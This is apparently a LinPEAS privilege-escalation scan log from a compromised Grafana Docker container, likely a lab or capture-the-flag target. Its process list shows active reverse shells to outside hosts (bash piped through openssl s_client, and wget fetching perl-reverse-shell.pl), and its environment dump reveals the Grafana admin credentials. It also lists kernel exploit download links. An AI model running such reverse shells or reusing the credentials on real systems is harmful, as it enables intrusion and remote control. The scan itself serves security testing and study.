                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |                                                
    |---------------------------------------------------------------------------------|                                                
    |         Learn Cloud Hacking       :     https://training.hacktricks.xyz         |                                                
    |         Follow on Twitter         :     @hacktricks_live                        |                                                
    |         Respect on HTB            :     SirBroccoli                             |                                                
    |---------------------------------------------------------------------------------|                                                
    |                                 Thank you!                                      |                                                
    \---------------------------------------------------------------------------------/                                                
          LinPEAS-ng by carlospolop                                                                                                    
                                                                                                                                       
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                                                                                                                           
                                                                                                                                       
Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
 LEGEND:                                                                                                                               
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

  YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                    
                               ╚═══════════════════╝                                                                                   
OS: Linux version 6.8.0-59-generic (buildd@lcy02-amd64-035) (x86_64-linux-gnu-gcc-13 (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0, GNU ld (GNU Binutils for Ubuntu) 2.42) #61-Ubuntu SMP PREEMPT_DYNAMIC Fri Apr 11 23:16:11 UTC 2025
User & Groups: uid=0(root) gid=0(root) groups=0(root)
Hostname: 7ce659d667d7

[-] No network discovery capabilities (fping or ping not found)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)                                                                                                       
                                                                                                                                       

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
                                                                                                                                       
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                                                     
                              ╚════════════════════╝                                                                                   
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits                                      
Linux version 6.8.0-59-generic (buildd@lcy02-amd64-035) (x86_64-linux-gnu-gcc-13 (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0, GNU ld (GNU Binutils for Ubuntu) 2.42) #61-Ubuntu SMP PREEMPT_DYNAMIC Fri Apr 11 23:16:11 UTC 2025
lsb_release Not Found
                                                                                                                                       
╔══════════╣ Sudo version
sudo Not Found                                                                                                                         
                                                                                                                                       

╔══════════╣ PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses                                 
                                                                                                                                       
╔══════════╣ Date & uptime
Sat Aug  9 09:46:43 UTC 2025                                                                                                           
 09:46:43 up 20:13,  0 users,  load average: 0.11, 0.04, 0.01

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                                                              
                                                                                                                                       
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
                                                                                                                                       
╔══════════╣ Environment
╚ Any private information inside environment variables?                                                                                
GF_PATHS_HOME=/usr/share/grafana                                                                                                       
HOSTNAME=7ce659d667d7
SHLVL=0
AWS_AUTH_EXTERNAL_ID=
HOME=/usr/share/grafana
OLDPWD=/root
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_LOGS=/var/log/grafana
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
AWS_AUTH_SESSION_DURATION=15m
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
PWD=/
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed                  
dmesg Not Found                                                                                                                        
                                                                                                                                       
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                     
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write                                                                                

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded


╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found                                                                                 
═╣ AppArmor profile? .............. docker-default (enforce)                                                                           
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found                                                                               
═╣ PaX bins present? .............. PaX Not Found                                                                                      
═╣ Execshield enabled? ............ Execshield Not Found                                                                               
═╣ SELinux enabled? ............... sestatus Not Found                                                                                 
═╣ Seccomp enabled? ............... enabled                                                                                            
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes                                                                                                

╔══════════╣ Kernel Modules Information
══╣ Kernel modules with weak perms?                                                                                                    
/lib/modules Not Found                                                                                                                 
                                                                                                                                       
══╣ Kernel modules loadable? 
Modules can be loaded                                                                                                                  



                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                                                    
                                   ╚═══════════╝                                                                                       
╔══════════╣ Container related tools present (if any):
/usr/bin/nsenter                                                                                                                       
/usr/bin/unshare
/usr/sbin/chroot

╔══════════╣ Container details
═╣ Is this a container? ........... docker                                                                                             
═╣ Any running containers? ........ No
                                                                                                                                       
╔══════════╣ Docker Container details
═╣ Am I inside Docker group ....... No                                                                                                 
═╣ Looking and enumerating Docker Sockets (if any):
═╣ Docker version ................. Not Found                                                                                          
═╣ Vulnerable to CVE-2019-5736 .... Not Found                                                                                          
═╣ Vulnerable to CVE-2019-13139 ... Not Found                                                                                          
═╣ Vulnerable to CVE-2021-41091 ... Not Found                                                                                          
═╣ Rootless Docker? ............... No                                                                                                 


╔══════════╣ Container & breakout enumeration
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html 
═╣ Container ID ................... 7ce659d667d7═╣ Container Full ID .............. /                                                  
══╣ Security Mechanisms
═╣ Seccomp enabled? ............... enabled                                                                                            
═╣ AppArmor profile? .............. docker-default (enforce)
═╣ User proc namespace? ........... enabled         0          0 4294967295
══╣ Known Vulnerabilities
═╣ Vulnerable to CVE-2019-5021 .... No                                                                                                 
                                                                                                                                       
═╣ Container escape tools present .. /usr/bin/nsenter
══╣ Runtime Vulnerabilities
══╣ Breakout via mounts                                                                                                                
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html                                                                                                                             
═╣ /proc mounted? ................. Yes                                                                                                
═╣ /dev mounted? .................. No
═╣ Run unshare .................... No                                                                                                 
═╣ release_agent breakout 1........ No                                                                                                 
═╣ release_agent breakout 2........ No                                                                                                 
═╣ release_agent breakout 3........                                                                                                    
═╣ core_pattern breakout .......... No                                                                                                 
═╣ binfmt_misc breakout ........... No                                                                                                 
═╣ uevent_helper breakout ......... No                                                                                                 
═╣ Docker socket mounted? ......... No                                                                                                 
═╣ Common host filesystem mounted?  /dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hostname type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hosts type ext4 (rw,relatime)
═╣ Interesting mounts ............. overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/3X4OJGQ2VFLUPGUBU2QSGDA67Q:/var/lib/docker/overlay2/l/WKSUASLWRLDJ5Z3HUM3UWOCERN:/var/lib/docker/overlay2/l/FNIAPVIFHONGK5UUWODDB3HIEZ:/var/lib/docker/overlay2/l/TQFT6TIJRPQ7JPRYGS3IZSMHZD:/var/lib/docker/overlay2/l/ZNRJYR4L6MSXWYNEVHMA7SOK4K:/var/lib/docker/overlay2/l/7VFG4MJXMKBY4JRM3RMBIKDDGI:/var/lib/docker/overlay2/l/QB5XD7D4U5DQ22OYSUX6QDX24V:/var/lib/docker/overlay2/l/QVCFBNTZYDNPP6DXABR4R4N2K6:/var/lib/docker/overlay2/l/SYGRYVYZM5LKLX5UBPKUWAV7ZF:/var/lib/docker/overlay2/l/AKAAOHAM5BHB3XSZYHXJJ7L5CZ:/var/lib/docker/overlay2/l/FMIYHYMPSESM3E3C6JPZWCBKWY:/var/lib/docker/overlay2/l/OAC6WUQ3B4JTAEKGVTRLUU4D2N:/var/lib/docker/overlay2/l/BBMA3AJS2WGZ55ID5AHIUVNGRU,upperdir=/var/lib/docker/overlay2/dd276dc3c44059747fa6dbb0289cda02c4f20798df65f186eb63ef1f46bab04f/diff,workdir=/var/lib/docker/overlay2/dd276dc3c44059747fa6dbb0289cda02c4f20798df65f186eb63ef1f46bab04f/work,nouserxattr)
═╣ Writable mount points ......... overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/3X4OJGQ2VFLUPGUBU2QSGDA67Q:/var/lib/docker/overlay2/l/WKSUASLWRLDJ5Z3HUM3UWOCERN:/var/lib/docker/overlay2/l/FNIAPVIFHONGK5UUWODDB3HIEZ:/var/lib/docker/overlay2/l/TQFT6TIJRPQ7JPRYGS3IZSMHZD:/var/lib/docker/overlay2/l/ZNRJYR4L6MSXWYNEVHMA7SOK4K:/var/lib/docker/overlay2/l/7VFG4MJXMKBY4JRM3RMBIKDDGI:/var/lib/docker/overlay2/l/QB5XD7D4U5DQ22OYSUX6QDX24V:/var/lib/docker/overlay2/l/QVCFBNTZYDNPP6DXABR4R4N2K6:/var/lib/docker/overlay2/l/SYGRYVYZM5LKLX5UBPKUWAV7ZF:/var/lib/docker/overlay2/l/AKAAOHAM5BHB3XSZYHXJJ7L5CZ:/var/lib/docker/overlay2/l/FMIYHYMPSESM3E3C6JPZWCBKWY:/var/lib/docker/overlay2/l/OAC6WUQ3B4JTAEKGVTRLUU4D2N:/var/lib/docker/overlay2/l/BBMA3AJS2WGZ55ID5AHIUVNGRU,upperdir=/var/lib/docker/overlay2/dd276dc3c44059747fa6dbb0289cda02c4f20798df65f186eb63ef1f46bab04f/diff,workdir=/var/lib/docker/overlay2/dd276dc3c44059747fa6dbb0289cda02c4f20798df65f186eb63ef1f46bab04f/work,nouserxattr)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/resolv.conf type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hostname type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hosts type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /var/lib/grafana type ext4 (rw,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/latency_stats type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
═╣ Shared mount points ........... ══╣ Capability Checks
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/capabilities-abuse-escape.html                                                                                                                    
═╣ Dangerous capabilities ......... CapInh: 0000000000000000                                                                           
CapPrm: 00000000a00425fb
CapEff: 00000000a00425fb
CapBnd: 00000000a00425fb
CapAmb: 0000000000000000
Run capsh --decode=<hex> to decode the capabilities
═╣ Dangerous syscalls allowed ... 1
══╣ Namespace Checks
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/namespaces/index.html                           
═╣ Current namespaces ............. total 0                                                                                            
lrwxrwxrwx 1 root root 0 Aug  9 09:46 cgroup -> cgroup:[4026532689]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 ipc -> ipc:[4026532601]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 mnt -> mnt:[4026532599]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 net -> net:[4026532603]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 pid -> pid:[4026532602]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 pid_for_children -> pid:[4026532602]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 time -> time:[4026531834]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 time_for_children -> time:[4026531834]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 user -> user:[4026531837]
lrwxrwxrwx 1 root root 0 Aug  9 09:46 uts -> uts:[4026532600]
═╣ Host network namespace? ........ No
═╣ Host IPC namespace? ........... No
═╣ Host PID namespace? ........... No
═╣ Host UTS namespace? ........... No
══╣ Additional Breakout Vectors
═╣ is modprobe present ............ No                                                                                                 
═╣ DoS via panic_on_oom ........... No                                                                                                 
═╣ DoS via panic_sys_fs ........... No                                                                                                 
═╣ DoS via sysreq_trigger_dos ..... No                                                                                                 
═╣ Container escape tools in PATH . /usr/bin/nsenter                                                                                   
══╣ Extra Breakout Vectors
═╣ /proc/config.gz readable ....... No                                                                                                 
═╣ /proc/sched_debug readable ..... No                                                                                                 
═╣ /proc/*/mountinfo readable ..... No                                                                                                 
═╣ /sys/kernel/security present ... Yes                                                                                                
═╣ /sys/kernel/security writable .. No
═╣ /proc/kmsg readable ............ No                                                                                                 
═╣ /proc/kallsyms readable ........ Yes                                                                                                
═╣ /proc/self/mem readable ........ No
═╣ /proc/kcore readable ........... No                                                                                                 
═╣ /proc/kmem readable ............ No                                                                                                 
═╣ /proc/kmem writable ............ No                                                                                                 
═╣ /proc/mem readable ............. No                                                                                                 
═╣ /proc/mem writable ............. No                                                                                                 
═╣ /sys/kernel/vmcoreinfo readable  Yes                                                                                                
═╣ /sys/firmware/efi/vars writable  No
═╣ /sys/firmware/efi/efivars writable No                                                                                               
═╣ Kernel version .............. Linux 7ce659d667d7 6.8.0-59-generic #61-Ubuntu SMP PREEMPT_DYNAMIC Fri Apr 11 23:16:11 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
═╣ Kernel modules ............. ./linpeas.sh: 2296: lsmod: not found
═╣ Container runtime sockets .. No
═╣ Container runtime configs .. No
══╣ Interesting Files & Mounts
═╣ Interesting files mounted ........ overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/3X4OJGQ2VFLUPGUBU2QSGDA67Q:/var/lib/docker/overlay2/l/WKSUASLWRLDJ5Z3HUM3UWOCERN:/var/lib/docker/overlay2/l/FNIAPVIFHONGK5UUWODDB3HIEZ:/var/lib/docker/overlay2/l/TQFT6TIJRPQ7JPRYGS3IZSMHZD:/var/lib/docker/overlay2/l/ZNRJYR4L6MSXWYNEVHMA7SOK4K:/var/lib/docker/overlay2/l/7VFG4MJXMKBY4JRM3RMBIKDDGI:/var/lib/docker/overlay2/l/QB5XD7D4U5DQ22OYSUX6QDX24V:/var/lib/docker/overlay2/l/QVCFBNTZYDNPP6DXABR4R4N2K6:/var/lib/docker/overlay2/l/SYGRYVYZM5LKLX5UBPKUWAV7ZF:/var/lib/docker/overlay2/l/AKAAOHAM5BHB3XSZYHXJJ7L5CZ:/var/lib/docker/overlay2/l/FMIYHYMPSESM3E3C6JPZWCBKWY:/var/lib/docker/overlay2/l/OAC6WUQ3B4JTAEKGVTRLUU4D2N:/var/lib/docker/overlay2/l/BBMA3AJS2WGZ55ID5AHIUVNGRU,upperdir=/var/lib/docker/overlay2/dd276dc3c44059747fa6dbb0289cda02c4f20798df65f186eb63ef1f46bab04f/diff,workdir=/var/lib/docker/overlay2/dd276dc3c44059747fa6dbb0289cda02c4f20798df65f186eb63ef1f46bab04f/work,nouserxattr)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/resolv.conf type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hostname type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hosts type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /var/lib/grafana type ext4 (rw,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime,inode64)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/latency_stats type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/scsi type tmpfs (ro,relatime,inode64)
tmpfs on /sys/firmware type tmpfs (ro,relatime,inode64)
═╣ Possible entrypoints ........... -rw-r--r-- 1 root root    0 Aug  8 23:46 /tmp/rshell.sh
-rwxr-xr-x 1 root root 3.3K May 14  2024 /run.sh
-rwxr-xr-x 1 root root 933K Aug  8 20:15 /tmp/linpeas.sh
-rwxrwxrwx 1 root root 934K Aug  6 13:57 /linpeas.sh



                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════                                                    
                                     ╚═══════╝                                                                                         
Learn and practice cloud hacking techniques in https://training.hacktricks.xyz
                                                                                                                                       
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                     
                ╚════════════════════════════════════════════════╝                                                                     
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes                                                                                                                                   
root           1  0.2  3.2 1588068 61908 ?       Ssl  Aug08   2:26 grafana server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cfg:default.log.mode=console cfg:default.paths.data=/var/lib/grafana cfg:default.paths.logs=/var/log/grafana cfg:default.paths.plugins=/var/lib/grafana/plugins cfg:default.paths.provisioning=/etc/grafana/provisioning                        
root          69  0.0  1.0 342432 19712 ?        Sl   Aug08   0:00 /usr/local/bin/duckdb
root          75  0.0  0.0   2892  1536 ?        S    Aug08   0:00  _ sh -c cat /tmp/f | /bin/bash -i 2>&1 | openssl s_client -quiet -connect 10.10.14.144:4444 > /tmp/f  >/tmp/grafana_cmd_output 2>&1
root          76  0.0  0.0   2932  1408 ?        S    Aug08   0:00      _ cat /tmp/f
root          77  0.0  0.1   4616  3072 ?        S    Aug08   0:00      _ /bin/bash -i
root          78  0.0  0.1   9760  3200 ?        S    Aug08   0:00      _ openssl s_client -quiet -connect 10.10.14.144:4444
root         236  0.0  1.0 407968 20096 ?        Sl   Aug08   0:00 /usr/local/bin/duckdb
root         242  0.0  0.0   2892  1536 ?        S    Aug08   0:00  _ sh -c bash /tmp/rev
root         243  0.0  0.1   4364  2944 ?        S    Aug08   0:00      _ bash /tmp/rev
root         245  0.0  0.0   2892  1536 ?        S    Aug08   0:00          _ sh -i
root         289  0.0  0.0   2932  1280 ?        S    Aug08   0:00              _ cat f
root        8822  0.0  0.0   4364  1416 ?        S    Aug08   0:00 bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS accessible") | grep "accessible" && exit 0 ) 2>/dev/null || echo "DNS is not accessible"
root        8824  0.0  0.0   4364  1160 ?        S    Aug08   0:00  _ bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS accessible") | grep "accessible" && exit 0 ) 2>/dev/null || echo "DNS is not accessible"
root        8825  0.0  0.0   4364  1548 ?        S    Aug08   0:00  |   _ bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS accessible") | grep "accessible" && exit 0 ) 2>/dev/null || echo "DNS is not accessible"
root        8830  0.0  0.0   2828  1408 ?        S    Aug08   0:00  |       _ dd bs=9000 count=1
root        8826  0.0  0.0   3472  1792 ?        S    Aug08   0:00  _ grep accessible
root       13103  0.0  1.1 473504 22656 ?        Sl   09:33   0:00 /usr/local/bin/duckdb
root       13109  0.0  0.0   2892  1536 ?        S    09:33   0:00  _ sh -c wget http://192.168.1.62:4444/perl-reverse-shell.pl -o /tmp/rev.pl >/tmp/grafana_cmd_output 2>&1                                                                                                  
root       13110  0.0  0.2  10972  4224 ?        S    09:33   0:00      _ wget http://192.168.1.62:4444/perl-reverse-shell.pl -o /tmp/rev.pl
root       13111  0.0  1.1 407968 22656 ?        Sl   09:34   0:00 /usr/local/bin/duckdb
root       13117  0.0  0.0   2892  1664 ?        S    09:34   0:00  _ sh -c wget http://192.168.1.62:8000/perl-reverse-shell.pl -o /tmp/rev.pl >/tmp/grafana_cmd_output 2>&1                                                                                                  
root       13118  0.0  0.2  10972  4224 ?        S    09:34   0:00      _ wget http://192.168.1.62:8000/perl-reverse-shell.pl -o /tmp/rev.pl
root       13221  0.0  0.0   2892  1536 ?        Ss   09:42   0:00 /usr/sbin/apache -i
root       13235  0.2  0.1   3820  2560 ?        S    09:46   0:00  _ /bin/sh ./linpeas.sh
root       15952  0.0  0.0   3820  1440 ?        S    09:47   0:00      _ /bin/sh ./linpeas.sh
root       15954  0.0  0.1   7208  2944 ?        R    09:47   0:00      |   _ ps fauxwww
root       15956  0.0  0.0   3820  1440 ?        S    09:47   0:00      _ /bin/sh ./linpeas.sh

╔══════════╣ Processes with unusual configurations
Process 1 (root) - grafana server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cf                
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 69 (root) - /usr/local/bin/duckdb  
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 75 (root) - sh -c cat /tmp/f | /bin/bash -i 2>&1 | openssl s_client -quiet -connect 10.10.14.144:4444 > /tmp/f
 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 76 (root) - cat /tmp/f 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 77 (root) - /bin/bash -i 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 78 (root) - openssl s_client -quiet -connect 10.10.14.144:4444 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 236 (root) - /usr/local/bin/duckdb  
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 242 (root) - sh -c bash /tmp/rev  
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 243 (root) - bash /tmp/rev 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 245 (root) - sh -i 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 289 (root) - cat f 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 8822 (root) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 8824 (root) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 8825 (root) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 8826 (root) - grep accessible 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 8830 (root) - dd bs=9000 count=1 
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

Process 13103 (root) - /usr/local/bin/duckdb  
SELinux context: docker-default (enforce)
  └─ AppArmor profile: docker-default (enforce)

